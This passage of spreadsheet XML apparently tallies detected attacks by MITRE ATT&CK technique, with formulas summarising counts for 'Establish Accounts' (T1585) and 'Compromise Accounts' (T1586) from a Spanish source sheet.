        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT66" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU66" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV66" s="292">
        <v>0</v>
      </c>
      <c r="BW66" s="322">
        <v>0</v>
      </c>
      <c r="BX66" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY66" s="12">
        <v>0</v>
      </c>
      <c r="BZ66" s="13">
        <v>0</v>
      </c>
      <c r="CA66" s="394">
        <v>0</v>
      </c>
      <c r="CB66" s="288">
        <v>0</v>
      </c>
      <c r="CC66" s="4">
        <v>0</v>
      </c>
      <c r="CD66" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE66" s="4">
        <v>0</v>
      </c>
      <c r="CF66" s="4">
        <v>0</v>
      </c>
      <c r="CG66" s="13">
        <v>0</v>
      </c>
      <c r="CH66" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:98" ht="15" customHeight="1">
      <c r="A67" s="4">
        <f t="shared" si="13"/>
        <v>65</v>
      </c>
      <c r="B67" s="4" t="str">
        <f>IFERROR(VLOOKUP(A67,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1585</v>
      </c>
      <c r="C67" s="4" t="str">
        <f>IFERROR(VLOOKUP(B67,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Establish Accounts</v>
      </c>
      <c r="D67" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B67)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>129</v>
      </c>
      <c r="F67" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (129)</v>
      </c>
      <c r="G67" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>1675</v>
      </c>
      <c r="H67" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>312</v>
      </c>
      <c r="I67" s="322" t="str">
        <f t="shared" si="0"/>
        <v>312 (1675)</v>
      </c>
      <c r="J67" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>6</v>
      </c>
      <c r="K67" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>125</v>
      </c>
      <c r="M67" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N67" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O67" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P67" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q67" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S67" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>1675</v>
      </c>
      <c r="T67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>312</v>
      </c>
      <c r="U67" s="4" t="str">
        <f t="shared" si="2"/>
        <v>312 (1675)</v>
      </c>
      <c r="V67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="W67" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>125</v>
      </c>
      <c r="Y67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>1676</v>
      </c>
      <c r="Z67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>312</v>
      </c>
      <c r="AA67" s="322" t="str">
        <f t="shared" si="3"/>
        <v>312 (1676)</v>
      </c>
      <c r="AB67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="AC67" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>125</v>
      </c>
      <c r="AE67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>3</v>
      </c>
      <c r="AF67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>3</v>
      </c>
      <c r="AG67" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (3)</v>
      </c>
      <c r="AH67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>1</v>
      </c>
      <c r="AI67" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>3</v>
      </c>
      <c r="AK67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>1679</v>
      </c>
      <c r="AL67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>315</v>
      </c>
      <c r="AM67" s="322" t="str">
        <f t="shared" si="5"/>
        <v>315 (1679)</v>
      </c>
      <c r="AN67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>7</v>
      </c>
      <c r="AO67" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>125</v>
      </c>
      <c r="AQ67" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR67" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS67" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT67" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU67" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY67" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ67" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA67" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC67" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>1675</v>
      </c>
      <c r="BD67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>312</v>
      </c>
      <c r="BE67" s="4" t="str">
        <f t="shared" si="8"/>
        <v>312 (1675)</v>
      </c>
      <c r="BF67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>6</v>
      </c>
      <c r="BG67" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>125</v>
      </c>
      <c r="BI67" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>129</v>
      </c>
      <c r="BJ67" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>129</v>
      </c>
      <c r="BK67" s="322" t="str">
        <f t="shared" si="9"/>
        <v>129 (129)</v>
      </c>
      <c r="BL67" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM67" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>129</v>
      </c>
      <c r="BO67" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>129</v>
      </c>
      <c r="BP67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>129</v>
      </c>
      <c r="BQ67" s="4" t="str">
        <f t="shared" si="10"/>
        <v>129 (129)</v>
      </c>
      <c r="BR67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>0</v>
      </c>
      <c r="BT67" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU67" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>129</v>
      </c>
      <c r="BV67" s="292">
        <v>135</v>
      </c>
      <c r="BW67" s="322">
        <v>135</v>
      </c>
      <c r="BX67" s="4" t="str">
        <f t="shared" si="11"/>
        <v>135 (135)</v>
      </c>
      <c r="BY67" s="12">
        <v>2</v>
      </c>
      <c r="BZ67" s="13">
        <v>1</v>
      </c>
      <c r="CA67" s="394">
        <v>124</v>
      </c>
      <c r="CB67" s="288">
        <v>270</v>
      </c>
      <c r="CC67" s="4">
        <v>259</v>
      </c>
      <c r="CD67" s="4" t="str">
        <f t="shared" si="12"/>
        <v>259 (270)</v>
      </c>
      <c r="CE67" s="4">
        <v>2</v>
      </c>
      <c r="CF67" s="4">
        <v>1</v>
      </c>
      <c r="CG67" s="13">
        <v>1</v>
      </c>
      <c r="CH67" s="394">
        <v>124</v>
      </c>
    </row>
    <row r="68" spans="1:98" ht="15" customHeight="1">
      <c r="A68" s="4">
        <f t="shared" si="13"/>
        <v>66</v>
      </c>
      <c r="B68" s="4" t="str">
        <f>IFERROR(VLOOKUP(A68,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1586</v>
      </c>
      <c r="C68" s="4" t="str">
        <f>IFERROR(VLOOKUP(B68,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Compromise Accounts</v>
      </c>
      <c r="D68" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B68)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>6951</v>
      </c>
      <c r="F68" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (6951)</v>
      </c>
      <c r="G68" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>21291</v>
      </c>
      <c r="H68" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>5739</v>
      </c>
      <c r="I68" s="322" t="str">
        <f t="shared" ref="I68:I79" si="15">H68 &amp; " (" &amp; G68 &amp; ")"</f>
        <v>5739 (21291)</v>
      </c>
      <c r="J68" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K68" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>5739</v>
      </c>
      <c r="M68" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>3652</v>
      </c>
      <c r="N68" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>2147</v>
      </c>
      <c r="O68" s="322" t="str">
        <f t="shared" ref="O68:O79" si="16">N68 &amp; " (" &amp; M68 &amp; ")"</f>
        <v>2147 (3652)</v>
      </c>
      <c r="P68" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>15</v>
      </c>
      <c r="Q68" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1253</v>
      </c>
      <c r="S68" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>24943</v>
      </c>
      <c r="T68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>7886</v>
      </c>
      <c r="U68" s="4" t="str">
        <f t="shared" ref="U68:U79" si="17">T68 &amp; " (" &amp; S68 &amp; ")"</f>
        <v>7886 (24943)</v>
      </c>
      <c r="V68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>16</v>
      </c>
      <c r="W68" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>5955</v>
      </c>
      <c r="Y68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>656724</v>
      </c>
      <c r="Z68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>15339</v>
      </c>
      <c r="AA68" s="322" t="str">
        <f t="shared" ref="AA68:AA79" si="18">Z68 &amp; " (" &amp; Y68 &amp; ")"</f>
        <v>15339 (656724)</v>
      </c>
      <c r="AB68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>16</v>
      </c>
      <c r="AC68" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>6166</v>
      </c>
      <c r="AE68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>29203</v>
      </c>
      <c r="AF68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>10983</v>
      </c>
      <c r="AG68" s="322" t="str">
        <f t="shared" ref="AG68:AG79" si="19">AF68 &amp; " (" &amp; AE68 &amp; ")"</f>
        <v>10983 (29203)</v>
      </c>
      <c r="AH68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>29</v>
      </c>
      <c r="AI68" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>6950</v>
      </c>
      <c r="AK68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>676263</v>
      </c>
      <c r="AL68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>23264</v>
      </c>
      <c r="AM68" s="322" t="str">
        <f t="shared" ref="AM68:AM79" si="20">AL68 &amp; " (" &amp; AK68 &amp; ")"</f>
        <v>23264 (676263)</v>
      </c>
      <c r="AN68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>80</v>
      </c>
      <c r="AO68" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>6950</v>
      </c>
      <c r="AQ68" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR68" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS68" s="322" t="str">
        <f t="shared" ref="AS68:AS79" si="21">AR68 &amp; " (" &amp; AQ68 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AT68" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU68" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>10190</v>
      </c>
      <c r="AX68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>6728</v>
      </c>
      <c r="AY68" s="322" t="str">
        <f t="shared" ref="AY68:AY79" si="22">AX68 &amp; " (" &amp; AW68 &amp; ")"</f>
        <v>6728 (10190)</v>
      </c>
      <c r="AZ68" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>46</v>
      </c>
      <c r="BA68" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>3231</v>
      </c>
      <c r="BC68" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>35133</v>
      </c>
      <c r="BD68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>14614</v>
      </c>
      <c r="BE68" s="4" t="str">
        <f t="shared" ref="BE68:BE79" si="23">BD68 &amp; " (" &amp; BC68 &amp; ")"</f>
        <v>14614 (35133)</v>
      </c>
      <c r="BF68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>62</v>
      </c>
      <c r="BG68" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>6351</v>
      </c>
      <c r="BI68" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>611</v>
      </c>
      <c r="BJ68" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>460</v>
      </c>
      <c r="BK68" s="322" t="str">
